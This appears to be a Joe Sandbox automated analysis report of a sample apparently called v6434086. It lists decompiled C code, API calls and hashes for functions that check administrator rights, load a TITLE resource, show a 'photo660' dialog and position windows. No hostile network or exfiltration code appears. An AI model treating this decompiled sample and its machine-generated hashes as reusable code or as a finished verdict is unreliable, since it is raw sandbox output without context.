                                                                                                                                                                                                        0x00bc18fa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1912
                                                                                                                                                                                                        0x00bc19aa
                                                                                                                                                                                                        0x00bc19ad
                                                                                                                                                                                                        0x00bc19b3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1927
                                                                                                                                                                                                        0x00bc1927
                                                                                                                                                                                                        0x00bc1932
                                                                                                                                                                                                        0x00bc1936
                                                                                                                                                                                                        0x00bc19a9
                                                                                                                                                                                                        0x00bc19a9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc19a9
                                                                                                                                                                                                        0x00bc194c
                                                                                                                                                                                                        0x00bc19a2
                                                                                                                                                                                                        0x00bc19a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc196e
                                                                                                                                                                                                        0x00bc1970
                                                                                                                                                                                                        0x00bc1999
                                                                                                                                                                                                        0x00bc199c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc199c
                                                                                                                                                                                                        0x00bc1972
                                                                                                                                                                                                        0x00bc1972
                                                                                                                                                                                                        0x00bc1975
                                                                                                                                                                                                        0x00bc1984
                                                                                                                                                                                                        0x00bc1985
                                                                                                                                                                                                        0x00bc198a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc198c
                                                                                                                                                                                                        0x00bc1991
                                                                                                                                                                                                        0x00bc1996
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc1996
                                                                                                                                                                                                        0x00bc194c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00BC18DD), ref: 00BC181A
                                                                                                                                                                                                          • Part of subcall function 00BC17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00BC182C
                                                                                                                                                                                                          • Part of subcall function 00BC17EE: AllocateAndInitializeSid.ADVAPI32(00BC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BC18DD), ref: 00BC1855
                                                                                                                                                                                                          • Part of subcall function 00BC17EE: FreeSid.ADVAPI32(?,?,?,?,00BC18DD), ref: 00BC1883
                                                                                                                                                                                                          • Part of subcall function 00BC17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00BC18DD), ref: 00BC188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00BC18EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00BC18F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00BC190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BC1918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00BC192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00BC1944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00BC1964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00BC197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00BC199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00BC19A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00BC19AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: 31a0bf387cb5443ef11fd86ffa56f7641f4254620e61a037bfdc37cc179b9427
                                                                                                                                                                                                        • Instruction ID: cfbbc790c81df90abe10ddf163151cd6ec4f97964570503a6dbc2f0447ebf9d5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 31a0bf387cb5443ef11fd86ffa56f7641f4254620e61a037bfdc37cc179b9427
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81312C71A00209AFDB209FA9DC98FAFBBFCFF09745F100869E545E2151DB719906CB62
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00BC468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}








                                                                                                                                                                                                        0x00bc4699
                                                                                                                                                                                                        0x00bc469b
                                                                                                                                                                                                        0x00bc46a9
                                                                                                                                                                                                        0x00bc46af
                                                                                                                                                                                                        0x00bc46b4
                                                                                                                                                                                                        0x00bc46bc
                                                                                                                                                                                                        0x00bc46f9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc46f9
                                                                                                                                                                                                        0x00bc46d9
                                                                                                                                                                                                        0x00bc46dd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc46e5
                                                                                                                                                                                                        0x00bc46ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc46f5
                                                                                                                                                                                                        0x00bc46ff

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$photo660
                                                                                                                                                                                                        • API String ID: 3370778649-2621105198
                                                                                                                                                                                                        • Opcode ID: 8b6011b3d9d847ae50f50af62d352a5c919e1d155e44f8945418ff1a29e0a948
                                                                                                                                                                                                        • Instruction ID: af7c8c22cafa1ba5fb1b32f9a252c6f9bc906a070ac24e81bbf6f8c8bc1e1037
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b6011b3d9d847ae50f50af62d352a5c919e1d155e44f8945418ff1a29e0a948
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE01A9362442147BF31017A55C4DF6B7E6CDBCEF96F040068FA4AD7150CE71894186B6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E00BC17EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0xbca288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00BC6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}



















                                                                                                                                                                                                        0x00bc17f6
                                                                                                                                                                                                        0x00bc17fd
                                                                                                                                                                                                        0x00bc1805
                                                                                                                                                                                                        0x00bc180b
                                                                                                                                                                                                        0x00bc180d
                                                                                                                                                                                                        0x00bc1815
                                                                                                                                                                                                        0x00bc1818
                                                                                                                                                                                                        0x00bc1820
                                                                                                                                                                                                        0x00bc1824
                                                                                                                                                                                                        0x00bc182c
                                                                                                                                                                                                        0x00bc1832
                                                                                                                                                                                                        0x00bc1837
                                                                                                                                                                                                        0x00bc1851
                                                                                                                                                                                                        0x00bc1854
                                                                                                                                                                                                        0x00bc185d
                                                                                                                                                                                                        0x00bc1862
                                                                                                                                                                                                        0x00bc186c
                                                                                                                                                                                                        0x00bc1872
                                                                                                                                                                                                        0x00bc1877
                                                                                                                                                                                                        0x00bc187e
                                                                                                                                                                                                        0x00bc187e
                                                                                                                                                                                                        0x00bc1883
                                                                                                                                                                                                        0x00bc1883
                                                                                                                                                                                                        0x00bc185d
                                                                                                                                                                                                        0x00bc188a
                                                                                                                                                                                                        0x00bc188a
                                                                                                                                                                                                        0x00bc18a2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00BC18DD), ref: 00BC181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00BC182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00BC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BC18DD), ref: 00BC1855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,00BC18DD), ref: 00BC1883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00BC18DD), ref: 00BC188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: e64c6ab5e639ac193a5f370481138e0ad634417d80d1cf30e54f9e082ee47960
                                                                                                                                                                                                        • Instruction ID: 79a7bbd7bcc8aa7ed3ab02898b57b19cfaeb3d71af11e89b4e4e667bb768e887
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e64c6ab5e639ac193a5f370481138e0ad634417d80d1cf30e54f9e082ee47960
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5118171E00209ABDB109FA4DC49FBEBBB8EB49745F10056DFA11F3291DE309D008BA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E00BC43D0(_t24, _t12);
					SetWindowTextA(_t24, "photo660");
					SetDlgItemTextA(_t24, 0x838,  *0xbc9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0xbc91dc = 1;
					goto L8;
				}
				return 0;
			}








                                                                                                                                                                                                        0x00bc3459
                                                                                                                                                                                                        0x00bc345c
                                                                                                                                                                                                        0x00bc34d8
                                                                                                                                                                                                        0x00bc34de
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc34e0
                                                                                                                                                                                                        0x00bc345e
                                                                                                                                                                                                        0x00bc3463
                                                                                                                                                                                                        0x00bc349a
                                                                                                                                                                                                        0x00bc34a0
                                                                                                                                                                                                        0x00bc34a7
                                                                                                                                                                                                        0x00bc34b2
                                                                                                                                                                                                        0x00bc34c4
                                                                                                                                                                                                        0x00bc34cb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc34cb
                                                                                                                                                                                                        0x00bc3468
                                                                                                                                                                                                        0x00bc346e
                                                                                                                                                                                                        0x00bc3474
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc347c
                                                                                                                                                                                                        0x00bc348c
                                                                                                                                                                                                        0x00bc3490
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3496
                                                                                                                                                                                                        0x00bc3484
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3486
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3486
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00BC3490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BC349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00BC34B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00BC34C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00BC34CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 00BC34D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 852535152-1757243477
                                                                                                                                                                                                        • Opcode ID: bcaadf956081cc73c1446e7d4972d8d000a033819a7783361135c19169cb5da6
                                                                                                                                                                                                        • Instruction ID: 423aa8ca039e26746a188455d5b9869dee8a8a78c310fa9c92cf0579b90fd29b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcaadf956081cc73c1446e7d4972d8d000a033819a7783361135c19169cb5da6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F01B131240118ABE71E5F69DC0CE6D3AE5EB4AB04F448058F946A76A0CF308F41DB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC2AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00BC2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0xbc8004; // 0x9f7d84ca
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0xbc9a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00BC1680(_t65, E00BC17C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E00BC65E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00BC1680(_t65, E00BC17C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00BC6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                        0x00bc2aac
                                                                                                                                                                                                        0x00bc2ab7
                                                                                                                                                                                                        0x00bc2abc
                                                                                                                                                                                                        0x00bc2abe
                                                                                                                                                                                                        0x00bc2ac3
                                                                                                                                                                                                        0x00bc2ac6
                                                                                                                                                                                                        0x00bc2ac9
                                                                                                                                                                                                        0x00bc2ace
                                                                                                                                                                                                        0x00bc2ae6
                                                                                                                                                                                                        0x00bc2bdc
                                                                                                                                                                                                        0x00bc2bdc
                                                                                                                                                                                                        0x00bc2be0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2af2
                                                                                                                                                                                                        0x00bc2afc
                                                                                                                                                                                                        0x00bc2b00
                                                                                                                                                                                                        0x00bc2b05
                                                                                                                                                                                                        0x00bc2b05
                                                                                                                                                                                                        0x00bc2b0b
                                                                                                                                                                                                        0x00bc2bca
                                                                                                                                                                                                        0x00bc2bd1
                                                                                                                                                                                                        0x00bc2b11
                                                                                                                                                                                                        0x00bc2b18
                                                                                                                                                                                                        0x00bc2b26
                                                                                                                                                                                                        0x00bc2b99
                                                                                                                                                                                                        0x00bc2bc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2b9b
                                                                                                                                                                                                        0x00bc2bae
                                                                                                                                                                                                        0x00bc2bb3
                                                                                                                                                                                                        0x00bc2bb5
                                                                                                                                                                                                        0x00bc2bb5
                                                                                                                                                                                                        0x00bc2bb8
                                                                                                                                                                                                        0x00bc2bb8
                                                                                                                                                                                                        0x00bc2bba
                                                                                                                                                                                                        0x00bc2bbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2bb8
                                                                                                                                                                                                        0x00bc2b28
                                                                                                                                                                                                        0x00bc2b2e
                                                                                                                                                                                                        0x00bc2b33
                                                                                                                                                                                                        0x00bc2b39
                                                                                                                                                                                                        0x00bc2b3c
                                                                                                                                                                                                        0x00bc2b3c
                                                                                                                                                                                                        0x00bc2b3e
                                                                                                                                                                                                        0x00bc2b3f
                                                                                                                                                                                                        0x00bc2b55
                                                                                                                                                                                                        0x00bc2b5d
                                                                                                                                                                                                        0x00bc2b64
                                                                                                                                                                                                        0x00bc2b64
                                                                                                                                                                                                        0x00bc2b7a
                                                                                                                                                                                                        0x00bc2b7f
                                                                                                                                                                                                        0x00bc2b81
                                                                                                                                                                                                        0x00bc2b81
                                                                                                                                                                                                        0x00bc2b84
                                                                                                                                                                                                        0x00bc2b84
                                                                                                                                                                                                        0x00bc2b86
                                                                                                                                                                                                        0x00bc2b87
                                                                                                                                                                                                        0x00bc2bbf
                                                                                                                                                                                                        0x00bc2bc1
                                                                                                                                                                                                        0x00bc2bc1
                                                                                                                                                                                                        0x00bc2b26
                                                                                                                                                                                                        0x00bc2bda
                                                                                                                                                                                                        0x00bc2bda
                                                                                                                                                                                                        0x00bc2be6
                                                                                                                                                                                                        0x00bc2be6
                                                                                                                                                                                                        0x00bc2bf8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00BC2AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00BC2AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00BC2B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 00BC2B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 00BC2B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00BC2BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: 7041546bc83616ef33c2f8c8caff389e13901124ac97319649ed56991fdd5d77
                                                                                                                                                                                                        • Instruction ID: 82b2f47a19044defdcc44a7a5809a404a467a6c08ed63dd477f0307011723a61
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7041546bc83616ef33c2f8c8caff389e13901124ac97319649ed56991fdd5d77
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F341BF345042495EDB159F349854FBE7BE9DF5B314F1800DEE8C297202DF758E868B61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC43D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00BC43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00BC6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}
























                                                                                                                                                                                                        0x00bc43d0
                                                                                                                                                                                                        0x00bc43d8
                                                                                                                                                                                                        0x00bc43df
                                                                                                                                                                                                        0x00bc43e6
                                                                                                                                                                                                        0x00bc43ec
                                                                                                                                                                                                        0x00bc43f1
